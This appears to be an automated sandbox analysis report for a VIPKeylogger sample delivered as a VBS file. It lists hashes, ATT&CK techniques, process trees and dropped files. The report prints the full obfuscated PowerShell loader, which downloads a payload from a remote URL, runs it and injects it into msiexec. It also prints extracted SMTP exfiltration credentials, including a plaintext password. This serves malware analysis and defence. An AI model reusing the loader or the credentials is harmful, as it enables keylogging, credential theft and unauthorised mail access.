vipkeylogger | c23ce63e10c0e2830f689131779734a7664869c1387dc8809eee9505ee42770c

General

Target

c23ce63e10c0e2830f689131779734a7664869c1387dc8809eee9505ee42770c.vbs
Size

97KB
MD5

e87c0eb3faf117b1da8da391eeda594d
SHA1

882f81e1affeef2a61514531a2530744db0e3057
SHA256

c23ce63e10c0e2830f689131779734a7664869c1387dc8809eee9505ee42770c
SHA512

3d6d6a83eea102614a55d2532e08374239c95a07d16ecf4ffbf7ff6c4fe14b53954240a92b2c64d5c4d004e05ca1191a1ba6ed2d6519f1b1be9e151837c2b463
SSDEEP

1536:Q3GsFjLC4sU81EiZ4vDJKIjLLfzXnsfTMGzr0HBEdD5X6/ozz:wGWLjkEi2vDbjXbsfTlHsyDYiz

Score

10^/10

vipkeylogger discovery execution keylogger stealer

Malware Config

Extracted

Family

vipkeylogger

Credentials

Protocol: smtp
Host:
mail.lamela.si
Port:
587
Username:
[email protected]
Password:
2014viks5961lamela
Email To:
[email protected]

Signatures

VIPKeylogger
VIPKeylogger is a keylogger and infostealer written in C# and it resembles SnakeKeylogger that was found in 2020.
stealer keylogger vipkeylogger

Blocklisted process makes network request 7 IoCs

flow	pid	Process
2	2644	WScript.exe
7	2756	powershell.exe
9	2068	msiexec.exe
11	2068	msiexec.exe
14	2068	msiexec.exe
16	2068	msiexec.exe
18	2068	msiexec.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
2756	powershell.exe
1328	powershell.exe

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
13	checkip.dyndns.org

Network Service Discovery 1 TTPs 2 IoCs

Attempt to gather information on host's network.

discovery

Network Service Discovery

T1046

pid	Process
2756	powershell.exe
1328	powershell.exe

Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs

pid	Process
2068	msiexec.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

pid	Process
1328	powershell.exe
2068	msiexec.exe

System Location Discovery: System Language Discovery 1 TTPs 2 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	msiexec.exe

Suspicious behavior: EnumeratesProcesses 4 IoCs

pid	Process
2756	powershell.exe
1328	powershell.exe
1328	powershell.exe
2068	msiexec.exe

Suspicious behavior: MapViewOfSection 1 IoCs

pid	Process
1328	powershell.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeDebugPrivilege	2756	powershell.exe
Token: SeDebugPrivilege	1328	powershell.exe
Token: SeDebugPrivilege	2068	msiexec.exe

Suspicious use of WriteProcessMemory 11 IoCs

description	pid	Process	procid_target
PID 2644 wrote to memory of 2756	2644	WScript.exe	30
PID 2644 wrote to memory of 2756	2644	WScript.exe	30
PID 2644 wrote to memory of 2756	2644	WScript.exe	30
PID 1328 wrote to memory of 2068	1328	powershell.exe	35
PID 1328 wrote to memory of 2068	1328	powershell.exe	35
PID 1328 wrote to memory of 2068	1328	powershell.exe	35
PID 1328 wrote to memory of 2068	1328	powershell.exe	35
PID 1328 wrote to memory of 2068	1328	powershell.exe	35
PID 1328 wrote to memory of 2068	1328	powershell.exe	35
PID 1328 wrote to memory of 2068	1328	powershell.exe	35
PID 1328 wrote to memory of 2068	1328	powershell.exe	35

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\c23ce63e10c0e2830f689131779734a7664869c1387dc8809eee9505ee42770c.vbs"
1⤵
- Blocklisted process makes network request
- Suspicious use of WriteProcessMemory
PID:2644
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Harbouring Befoh Pikningerne Epiker #>;$Plicator='Fiberpladen';<#Falmede dekonstruktionerne Renssanceslots Cirkelrum Jobbeskrivelsen Fintmaskedes #>;$Divergeredes=$Unensouled+$host.UI;If ($Divergeredes) {$Tabelvrkets++;}function Udmugningsanlgs($Flakiest){$Mistnkes=$Dmmetnddateringsfases+$Flakiest.Length-$Tabelvrkets; for( $Dmmet=5;$Dmmet -lt $Mistnkes;$Dmmet+=6){$Kvidderen='Ellie';$Penclerk+=$Flakiest[$Dmmet];$Dataservice='democraw';}$Penclerk;}function Slighted($Udsprjtning){ . ($Isorhythmically) ($Udsprjtning);}$Skdernes=Udmugningsanlgs 'BjergMPapfaoMil ezO dukiHystelLillelQuestaSnaps/Wharp5,lven.O gav0Reque une (KombiWZ riliGu,stnKmpe,dTril,oAttitwAdenosInser BondfNAd,crTBun e Repro1Unsyn0Reada.Abidd0.vars; kll. Cl arWBinomiSolkun Hyl.6 Hedo4,asun;Kmele Smi xBee.e6Syner4 Tork; efe ElekrAnilivsu.ca:Lagre1Polit2Barb.1,esop.Bla.l0 Over)Unde WendGFavoneH.midc Eft kCa,aloFlota/Intr.2 Stre0Bindi1 .rne0Delng0Besti1Syn.p0 Dob,1Un ap DisocF K,rtiromanrDeporeArterfLedeloFormax c.ns/Lunte1C ndl2Autar1Schiz.Gald 0Troch ';$Opisthoparian=Udmugningsanlgs 'Hushpu Ordis DysaEInsulRTidsa-LandbARvrdiGOophyEVar eN HalvT amu ';$Dividendernes=Udmugningsanlgs 'allylhAngsttRein,tFuturp Posts ebyr:En ed/Ekser/ObstipInderu.uackb Togg-Sti i6 crou3 Blin4Trav 6Fouric eik8Udkas4Fir a8Osteo6Rabie0 Rap dSat e5Analg4Fe tl8Cysto0Co du3Anlbs9Biops3 StenaBh,ta1Nonsy7Sadde9centr9BibcofDekorbWorkf2Tilsa7T rsa7Lrebgd AblafAnomod akkecBehe..Narcor.irke2Obser.Ta godhandleFlo.ev Thal/EdainRRuinee egiot ulliaunrowb Debil eregeq ondrMabeliRelevnM,kadgForwoeBannenSwearsBrach. LaercErenasGallivwcero ';$Phagocytal167=Udmugningsanlgs ' Devi>Sving ';$Isorhythmically=Udmugningsanlgs ' utspiLa.erEEv.luXRecip ';$Deverbal='Lahnda';$Dumpishness='\Ufredeligt.Arb';Slighted (Udmugningsanlgs 'Runro$ AlliGJenvrl T.gfOK.oliBEpithABla.elCh nd:Uncomg FlgeU CopuMAbscamGavfli Blew=Vi.dr$Forv E.igtmnPrepoVMisbe: FuppaA,svrpCrenaPGuilddDade adelesT Uni aLeche+Unans$ S agDVolieu UnsemfragsP GaroiHalvfS oekkHApa inHon,reMajvisDhobiSC ron ');Slighted (Udmugningsanlgs 'Gorbl$AandegAhuacL PhytOwaspnb DaseASkrivlOverj:,ymbiEFejlsnEr tadU dere Sw bhstrutAUnrevkGrafokviljeeKle mt Fyr,=Byudv$SystedFdestiEichbv Sem IMalefd aduceTilhrNWhimpDIndbyeMeje RN enhNKapunETautoSRingl. reg,s.initp TaktLStud iVagabtWeiby( Dete$Deu,ePStraahI filAValutgCucuyoKodkoc Str YPenictCivilAFerskLStrkl1G.vne6G,mal7Preco),ikke ');Slighted (Udmugningsanlgs ' Incr[ SquiNSt.nne T dstFlor .BututSKrakmESkiver ,urvVSemilIHrerrcHaemaEVerstpMiloloMilieIUnderN T let WeakmWrootaDan.onR.ftlaobseqG bry ELennaROsteo] No l:Ishoc:JnedeSOver EBrandC Tun.uShi prB conILystntCribeYUnderpGargoRUntheoKagedtToughoPredicBugbeoMan.il Bols Rath= Meso Sumpe[Ink onU.enveUnposT Gues.OplysS EnerE OpreC Overuud,anRLetteI ImpotReloaYsnog,pCumshrEnscoO PladTPsychOB,nanC Co,boaffeclN umetRe diyAl.adpNoncoeOv rs]G,avm:Palee:D.uteT pallLouizSForur1Glott2Sticl ');$Dividendernes=$endehakket[0];$Tonikum=(Udmugningsanlgs 'Boxma$FodriGKornsL h ndo aanBUnrotASk,tslTitel:ErhveMAltdeiJuridRVer.aAUnderbPselaeSupe.ltettel ivstEKomodRRusheNAnk.aES davSHrdel=PreghnGoas,e nmoW Dend-SammeOInflebFanfajPeri eEccleCEschetPre.e edssKunsty atiosTripeT,kovleJenskMNagar.LaundnSt gnEUt sbtN.tic.E atiwNonelEta,onb AlkacBen,iLExtraiuncomESvej NAg raTP ski ');Slighted ($Tonikum);Slighted (Udmugningsanlgs 'Fodsl$ S hiMmicroiBegrirL,wriaU feeb BerbeU hanlWeighlRuddeeStatsrNedrin Proje Wiggs Dema.exp sH ugere PlumaF.siodrefereDismarPetitsP arm[ Prov$ A,klOM nnep Inddi BusesSn hatBetinhOversoUdsenpDra ka Per rSteriiSiz eaThi on Ankl]Fo va=Daabe$ StouS AfklkInstidAgouteRyg krOverin syndeD awls Reyn ');$Temposkiftets=Udmugningsanlgs ' Euca$Uig.nMtalnei Prfir Eg saPreaub pporeOpu ol gobll ookiekonsir ajaknMaragefe lss R gr.Ap oeDOvercoCrepewOffernMastolWiwisoFor aa Denudkla.pFAmt,aiThymil Oss e Wilf(I com$ aulD andbiVibriv ndei OssidTeoloeRe rinGardeddatomeNonrer FladnSko le Drags,oyar,Caser$GalvaU inghnS readA bejeD carr FletcGenskuUlvesrBicrerDappleOon,bnBolsjttra asErgon)Mahra ';$Undercurrents=$gummi;Slighted (Udmugningsanlgs ' Ther$Debe gmachilKontio octib Ko taRepetlEpisp:Non oTGodkehLslady riorNongrOKom ipBa ikRGidseILtninv PrelI Argyc undb=Sortk(Dy vat Sup,ESelvfSM linT Stig-KlgerPSultaA geswT UnsuHPedul Agter$ alanuNonatnS,cild LeveEShealrMistrcUdfreuForg,rForberpseu,E SamsnCrosstUpstasFestr) .ata ');while (!$Thyroprivic) {Slighted (Udmugningsanlgs 'Mach.$Innocg istel SvaeoFarveb Glaba.ujaslfarfa:Unin PGimmea bescsodyssfLaskeo rolerMiscam estueArmhurSrfor=E tre$ eadltVejsyrE affuS rvie tere ') ;Slighted $Temposkiftets;Slighted (Udmugningsanlgs 'Nyan.SSlumstN turaSemikR GambTExc u- ProfsHaspel JungE FortE.oldepRidd. Nonde4Laer. ');Slighted (Udmugningsanlgs 'Mod.r$FjortgFyrasl DansoAl aib br naGrsgaLPrev :OberstCrispHCamesYcprhyRBifloo Di iPObserR,abulIFlhopv DramIUdrenCAmbiv= Klan( GenaTAdoptEpoachSEnsept Te d-,rocepKund aKonnitAffekhUnd.r Blod$EndymUstil nTube.dW.itsETeat rin.ocC UanmU WarnRUnchurCoumaeGu neNRainetBinomS efst) rske ') ;Slighted (Udmugningsanlgs 'Pharm$ FlaaG stroLVer aO,odfoBJ.sigaSamlilSpytt:BrieriAns aSUnd foExtral Supey ataqSLaconiPsalmSInapp=Modst$ PartgmisprLKretuOFuchiBSirtsaFlnsel Su,r:FgetuaForsvLPte oa AlfebZa amACutifSSkilstTilmavPo araPlagiSs,asieTrila1Rknen5m tel0Splat+Bisca+Turn %Commu$IsraeEUnidenRadiuDE olueHibish asteaKrympKReparkcentrEseismT fish. ForscPluraOI terUAmblyN higet wing ') ;$Dividendernes=$endehakket[$isolysis];}$Pseudoleucite=316940;$Maegaard=30535;Slighted (Udmugningsanlgs 'brut,$BytraGChirpL DemoOMidsuBKonveaOchr Lrovdr: MalahlovreYSeminPEnsiloTakkeGVernolomganOOmstyS MaieSTuar.U,hockS imp Fusil= Yder SyncygUneccEIndretLeks.-klin cP asaOAtommnscandtKant eBoblenTr liT Ca,s Recur$JonahUGuardngriecDAg onEBit.mr eharcV dstUTrd.irKomm,rClepeeEvocan inkftV graS In e ');Slighted (Udmugningsanlgs 'After$ hemagGlumplNabkroK ldebRoyalaUr,thlOrtho:PansiT oleacetacnDiscut ZodiaGifttlStropuWorsesProstk .aravR diaaDisralOrkeseSt ndrErythnR,skre Bedo Fiske= Sl.n Count[P.edeSFerruy Signs PluvtDk,ofe eptomUvirk.S.ibeCNedsvoBerlin.epecv lnine BordrhistotTofte]Refas:Spare:TokreFCessmrGtestoReseimSnigmBkonciaPreprsEconoeunpro6Co,la4.uldkSAgitatT adirDvrgpiMorgenA locg Bros( Fstn$SkaftHFol,eyOmstnppolymoSlivegMes rlPhospoTranssTort.s Fa fuPittes Unl )Elelm ');Slighted (Udmugningsanlgs 'Cin u$OvermgToccal KibbO IneqbAfknaa ,ordl Unmi:Sepgst.egetO odkemServ aFore.N IconsC ado Biody=Archi Hylek[ VansS T meYLocutSLo.meTIndfreS artm Dikk. MelatUnswaeVedlixPrefeT ncle.H epsephytoNKonsucGuilyO subwDfinanI Mes,NTidsagLogi ]Barne: Sjle:UniseaEc ols Konjc Ki.ei KrusIdisen.ChichgUmb.iES linT Ban,S HydrtQuadrr eochiLavdon Madrg Enqu(Eklip$Kal,uTsy meAEl,ktnSubabTWisdoA AnoolDusthu LerwSBubblk OptavOpiniAFl ppLSangseFre,grMldrbNEnergEAl ah) rumf ');Slighted (Udmugningsanlgs 'Hazel$SpatigKlag lForskoS.rreb ,ndlA AntilAntip:Ugru sLivs MPenn.i BaldrAlcazKKlimaeN.nthREarthsMusic=Mona $Pekintin orOApodemDelbeASubsiNJu.els .ona.Famils TronuUnderbJordfSP ocrTNytterDepenI,antaNRh,naGYngle(Nigh $PrenzP eazSterzoESind uCreasdBobspORest lUngamEVkstlUBesqucTeheriChiruTFissie Verd, Comp$ BrneMVassaaFragtEBispeGPen,oaspdenALarryRDilemDFdekl)Plaic ');Slighted $Smirkers;"
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Network Service Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2756

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "<#Harbouring Befoh Pikningerne Epiker #>;$Plicator='Fiberpladen';<#Falmede dekonstruktionerne Renssanceslots Cirkelrum Jobbeskrivelsen Fintmaskedes #>;$Divergeredes=$Unensouled+$host.UI;If ($Divergeredes) {$Tabelvrkets++;}function Udmugningsanlgs($Flakiest){$Mistnkes=$Dmmetnddateringsfases+$Flakiest.Length-$Tabelvrkets; for( $Dmmet=5;$Dmmet -lt $Mistnkes;$Dmmet+=6){$Kvidderen='Ellie';$Penclerk+=$Flakiest[$Dmmet];$Dataservice='democraw';}$Penclerk;}function Slighted($Udsprjtning){ . ($Isorhythmically) ($Udsprjtning);}$Skdernes=Udmugningsanlgs 'BjergMPapfaoMil ezO dukiHystelLillelQuestaSnaps/Wharp5,lven.O gav0Reque une (KombiWZ riliGu,stnKmpe,dTril,oAttitwAdenosInser BondfNAd,crTBun e Repro1Unsyn0Reada.Abidd0.vars; kll. Cl arWBinomiSolkun Hyl.6 Hedo4,asun;Kmele Smi xBee.e6Syner4 Tork; efe ElekrAnilivsu.ca:Lagre1Polit2Barb.1,esop.Bla.l0 Over)Unde WendGFavoneH.midc Eft kCa,aloFlota/Intr.2 Stre0Bindi1 .rne0Delng0Besti1Syn.p0 Dob,1Un ap DisocF K,rtiromanrDeporeArterfLedeloFormax c.ns/Lunte1C ndl2Autar1Schiz.Gald 0Troch ';$Opisthoparian=Udmugningsanlgs 'Hushpu Ordis DysaEInsulRTidsa-LandbARvrdiGOophyEVar eN HalvT amu ';$Dividendernes=Udmugningsanlgs 'allylhAngsttRein,tFuturp Posts ebyr:En ed/Ekser/ObstipInderu.uackb Togg-Sti i6 crou3 Blin4Trav 6Fouric eik8Udkas4Fir a8Osteo6Rabie0 Rap dSat e5Analg4Fe tl8Cysto0Co du3Anlbs9Biops3 StenaBh,ta1Nonsy7Sadde9centr9BibcofDekorbWorkf2Tilsa7T rsa7Lrebgd AblafAnomod akkecBehe..Narcor.irke2Obser.Ta godhandleFlo.ev Thal/EdainRRuinee egiot ulliaunrowb Debil eregeq ondrMabeliRelevnM,kadgForwoeBannenSwearsBrach. LaercErenasGallivwcero ';$Phagocytal167=Udmugningsanlgs ' Devi>Sving ';$Isorhythmically=Udmugningsanlgs ' utspiLa.erEEv.luXRecip ';$Deverbal='Lahnda';$Dumpishness='\Ufredeligt.Arb';Slighted (Udmugningsanlgs 'Runro$ AlliGJenvrl T.gfOK.oliBEpithABla.elCh nd:Uncomg FlgeU CopuMAbscamGavfli Blew=Vi.dr$Forv E.igtmnPrepoVMisbe: FuppaA,svrpCrenaPGuilddDade adelesT Uni aLeche+Unans$ S agDVolieu UnsemfragsP GaroiHalvfS oekkHApa inHon,reMajvisDhobiSC ron ');Slighted (Udmugningsanlgs 'Gorbl$AandegAhuacL PhytOwaspnb DaseASkrivlOverj:,ymbiEFejlsnEr tadU dere Sw bhstrutAUnrevkGrafokviljeeKle mt Fyr,=Byudv$SystedFdestiEichbv Sem IMalefd aduceTilhrNWhimpDIndbyeMeje RN enhNKapunETautoSRingl. reg,s.initp TaktLStud iVagabtWeiby( Dete$Deu,ePStraahI filAValutgCucuyoKodkoc Str YPenictCivilAFerskLStrkl1G.vne6G,mal7Preco),ikke ');Slighted (Udmugningsanlgs ' Incr[ SquiNSt.nne T dstFlor .BututSKrakmESkiver ,urvVSemilIHrerrcHaemaEVerstpMiloloMilieIUnderN T let WeakmWrootaDan.onR.ftlaobseqG bry ELennaROsteo] No l:Ishoc:JnedeSOver EBrandC Tun.uShi prB conILystntCribeYUnderpGargoRUntheoKagedtToughoPredicBugbeoMan.il Bols Rath= Meso Sumpe[Ink onU.enveUnposT Gues.OplysS EnerE OpreC Overuud,anRLetteI ImpotReloaYsnog,pCumshrEnscoO PladTPsychOB,nanC Co,boaffeclN umetRe diyAl.adpNoncoeOv rs]G,avm:Palee:D.uteT pallLouizSForur1Glott2Sticl ');$Dividendernes=$endehakket[0];$Tonikum=(Udmugningsanlgs 'Boxma$FodriGKornsL h ndo aanBUnrotASk,tslTitel:ErhveMAltdeiJuridRVer.aAUnderbPselaeSupe.ltettel ivstEKomodRRusheNAnk.aES davSHrdel=PreghnGoas,e nmoW Dend-SammeOInflebFanfajPeri eEccleCEschetPre.e edssKunsty atiosTripeT,kovleJenskMNagar.LaundnSt gnEUt sbtN.tic.E atiwNonelEta,onb AlkacBen,iLExtraiuncomESvej NAg raTP ski ');Slighted ($Tonikum);Slighted (Udmugningsanlgs 'Fodsl$ S hiMmicroiBegrirL,wriaU feeb BerbeU hanlWeighlRuddeeStatsrNedrin Proje Wiggs Dema.exp sH ugere PlumaF.siodrefereDismarPetitsP arm[ Prov$ A,klOM nnep Inddi BusesSn hatBetinhOversoUdsenpDra ka Per rSteriiSiz eaThi on Ankl]Fo va=Daabe$ StouS AfklkInstidAgouteRyg krOverin syndeD awls Reyn ');$Temposkiftets=Udmugningsanlgs ' Euca$Uig.nMtalnei Prfir Eg saPreaub pporeOpu ol gobll ookiekonsir ajaknMaragefe lss R gr.Ap oeDOvercoCrepewOffernMastolWiwisoFor aa Denudkla.pFAmt,aiThymil Oss e Wilf(I com$ aulD andbiVibriv ndei OssidTeoloeRe rinGardeddatomeNonrer FladnSko le Drags,oyar,Caser$GalvaU inghnS readA bejeD carr FletcGenskuUlvesrBicrerDappleOon,bnBolsjttra asErgon)Mahra ';$Undercurrents=$gummi;Slighted (Udmugningsanlgs ' Ther$Debe gmachilKontio octib Ko taRepetlEpisp:Non oTGodkehLslady riorNongrOKom ipBa ikRGidseILtninv PrelI Argyc undb=Sortk(Dy vat Sup,ESelvfSM linT Stig-KlgerPSultaA geswT UnsuHPedul Agter$ alanuNonatnS,cild LeveEShealrMistrcUdfreuForg,rForberpseu,E SamsnCrosstUpstasFestr) .ata ');while (!$Thyroprivic) {Slighted (Udmugningsanlgs 'Mach.$Innocg istel SvaeoFarveb Glaba.ujaslfarfa:Unin PGimmea bescsodyssfLaskeo rolerMiscam estueArmhurSrfor=E tre$ eadltVejsyrE affuS rvie tere ') ;Slighted $Temposkiftets;Slighted (Udmugningsanlgs 'Nyan.SSlumstN turaSemikR GambTExc u- ProfsHaspel JungE FortE.oldepRidd. Nonde4Laer. ');Slighted (Udmugningsanlgs 'Mod.r$FjortgFyrasl DansoAl aib br naGrsgaLPrev :OberstCrispHCamesYcprhyRBifloo Di iPObserR,abulIFlhopv DramIUdrenCAmbiv= Klan( GenaTAdoptEpoachSEnsept Te d-,rocepKund aKonnitAffekhUnd.r Blod$EndymUstil nTube.dW.itsETeat rin.ocC UanmU WarnRUnchurCoumaeGu neNRainetBinomS efst) rske ') ;Slighted (Udmugningsanlgs 'Pharm$ FlaaG stroLVer aO,odfoBJ.sigaSamlilSpytt:BrieriAns aSUnd foExtral Supey ataqSLaconiPsalmSInapp=Modst$ PartgmisprLKretuOFuchiBSirtsaFlnsel Su,r:FgetuaForsvLPte oa AlfebZa amACutifSSkilstTilmavPo araPlagiSs,asieTrila1Rknen5m tel0Splat+Bisca+Turn %Commu$IsraeEUnidenRadiuDE olueHibish asteaKrympKReparkcentrEseismT fish. ForscPluraOI terUAmblyN higet wing ') ;$Dividendernes=$endehakket[$isolysis];}$Pseudoleucite=316940;$Maegaard=30535;Slighted (Udmugningsanlgs 'brut,$BytraGChirpL DemoOMidsuBKonveaOchr Lrovdr: MalahlovreYSeminPEnsiloTakkeGVernolomganOOmstyS MaieSTuar.U,hockS imp Fusil= Yder SyncygUneccEIndretLeks.-klin cP asaOAtommnscandtKant eBoblenTr liT Ca,s Recur$JonahUGuardngriecDAg onEBit.mr eharcV dstUTrd.irKomm,rClepeeEvocan inkftV graS In e ');Slighted (Udmugningsanlgs 'After$ hemagGlumplNabkroK ldebRoyalaUr,thlOrtho:PansiT oleacetacnDiscut ZodiaGifttlStropuWorsesProstk .aravR diaaDisralOrkeseSt ndrErythnR,skre Bedo Fiske= Sl.n Count[P.edeSFerruy Signs PluvtDk,ofe eptomUvirk.S.ibeCNedsvoBerlin.epecv lnine BordrhistotTofte]Refas:Spare:TokreFCessmrGtestoReseimSnigmBkonciaPreprsEconoeunpro6Co,la4.uldkSAgitatT adirDvrgpiMorgenA locg Bros( Fstn$SkaftHFol,eyOmstnppolymoSlivegMes rlPhospoTranssTort.s Fa fuPittes Unl )Elelm ');Slighted (Udmugningsanlgs 'Cin u$OvermgToccal KibbO IneqbAfknaa ,ordl Unmi:Sepgst.egetO odkemServ aFore.N IconsC ado Biody=Archi Hylek[ VansS T meYLocutSLo.meTIndfreS artm Dikk. MelatUnswaeVedlixPrefeT ncle.H epsephytoNKonsucGuilyO subwDfinanI Mes,NTidsagLogi ]Barne: Sjle:UniseaEc ols Konjc Ki.ei KrusIdisen.ChichgUmb.iES linT Ban,S HydrtQuadrr eochiLavdon Madrg Enqu(Eklip$Kal,uTsy meAEl,ktnSubabTWisdoA AnoolDusthu LerwSBubblk OptavOpiniAFl ppLSangseFre,grMldrbNEnergEAl ah) rumf ');Slighted (Udmugningsanlgs 'Hazel$SpatigKlag lForskoS.rreb ,ndlA AntilAntip:Ugru sLivs MPenn.i BaldrAlcazKKlimaeN.nthREarthsMusic=Mona $Pekintin orOApodemDelbeASubsiNJu.els .ona.Famils TronuUnderbJordfSP ocrTNytterDepenI,antaNRh,naGYngle(Nigh $PrenzP eazSterzoESind uCreasdBobspORest lUngamEVkstlUBesqucTeheriChiruTFissie Verd, Comp$ BrneMVassaaFragtEBispeGPen,oaspdenALarryRDilemDFdekl)Plaic ');Slighted $Smirkers;"
1⤵
- Command and Scripting Interpreter: PowerShell
- Network Service Discovery
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1328
- C:\Windows\syswow64\msiexec.exe
  "C:\Windows\syswow64\msiexec.exe"
  2⤵
  - Blocklisted process makes network request
  - Suspicious use of NtCreateThreadExHideFromDebugger
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2068

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Network Service Discovery

1

T1046

System Location Discovery

1

T1614

System Language Discovery

1

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
99c2ed1c54092514bd5f148d27712111

SHA1
9a980e09e6aad11b30e534801af477e14fe0203d

SHA256
3a7513b6e366942175cd059df6a371050770ac3701f012b401d455520869ee1e

SHA512
2c26bdf0d20560ca43ff810b9e6c7c15fc5e7245cee70ebbca247f63f1266b32ac4896463dbbda1f77c551adb240e0288059d1cdd7ad8c8a318ed8ed463b1368

Download Submit
C:\Users\Admin\AppData\Local\Temp\Cab35D.tmp

Filesize
70KB

MD5
49aebf8cbd62d92ac215b2923fb1b9f5

SHA1
1723be06719828dda65ad804298d0431f6aff976

SHA256
b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

SHA512
bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

Download Submit
C:\Users\Admin\AppData\Local\Temp\Tar6AB6.tmp

Filesize
181KB

MD5
4ea6026cf93ec6338144661bf1202cd1

SHA1
a1dec9044f750ad887935a01430bf49322fbdcb7

SHA256
8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8

SHA512
6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\R95XS2S32BB8UIOH8Q43.temp

Filesize
7KB

MD5
5a449826dc26746e04934901f83b5c30

SHA1
86b2676ae4bd75a76c5fe91c3534e2bab49a608d

SHA256
b29c16a171193d0d6c8b10e5d763f9e12dc03eb1df13eafb9b909a07ed122f95

SHA512
4fd265a161f132f7f4720a77d01babfd5d20a94338df1cd112ed02b6d65de22cfd30c42f659f25b8e55a7bd9786488015a040a2f118693bf27c0d035ca488125

Download Submit
C:\Users\Admin\AppData\Roaming\Ufredeligt.Arb

Filesize
452KB

MD5
9ee9daaadea64e665192e4e21fc02273

SHA1
536071a85c3383b1a47a6fefa8b98d23ea5eb97f

SHA256
4ce1bd9ffa49c03f84d30de79b28adfd9846abcadf8b41e05d4ac5ca9c43f25f

SHA512
0907b1bf5506acf847178b6e31b230af960dcdb60c46d623533091ad950a1b029402f23370c080cd39805a9ade14f10ac6785f8edf94d430245d97e931127543

Download Submit
memory/1328-35-0x0000000006720000-0x0000000009104000-memory.dmp

Filesize
41.9MB

Download
memory/2068-50-0x0000000000350000-0x000000000039A000-memory.dmp

Filesize
296KB

Download
memory/2068-49-0x0000000000350000-0x00000000013B2000-memory.dmp

Filesize
16.4MB

Download
memory/2756-22-0x0000000002760000-0x0000000002768000-memory.dmp

Filesize
32KB

Download
memory/2756-29-0x000007FEF6030000-0x000007FEF69CD000-memory.dmp

Filesize
9.6MB

Download
memory/2756-31-0x000007FEF6030000-0x000007FEF69CD000-memory.dmp

Filesize
9.6MB

Download
memory/2756-28-0x000007FEF62EE000-0x000007FEF62EF000-memory.dmp

Filesize
4KB

Download
memory/2756-26-0x000007FEF6030000-0x000007FEF69CD000-memory.dmp

Filesize
9.6MB

Download
memory/2756-24-0x000007FEF6030000-0x000007FEF69CD000-memory.dmp

Filesize
9.6MB

Download
memory/2756-25-0x000007FEF6030000-0x000007FEF69CD000-memory.dmp

Filesize
9.6MB

Download
memory/2756-23-0x000007FEF6030000-0x000007FEF69CD000-memory.dmp

Filesize
9.6MB

Download
memory/2756-21-0x000000001B500000-0x000000001B7E2000-memory.dmp

Filesize
2.9MB

Download
memory/2756-20-0x000007FEF62EE000-0x000007FEF62EF000-memory.dmp

Filesize
4KB

Download

Analysis

Sharing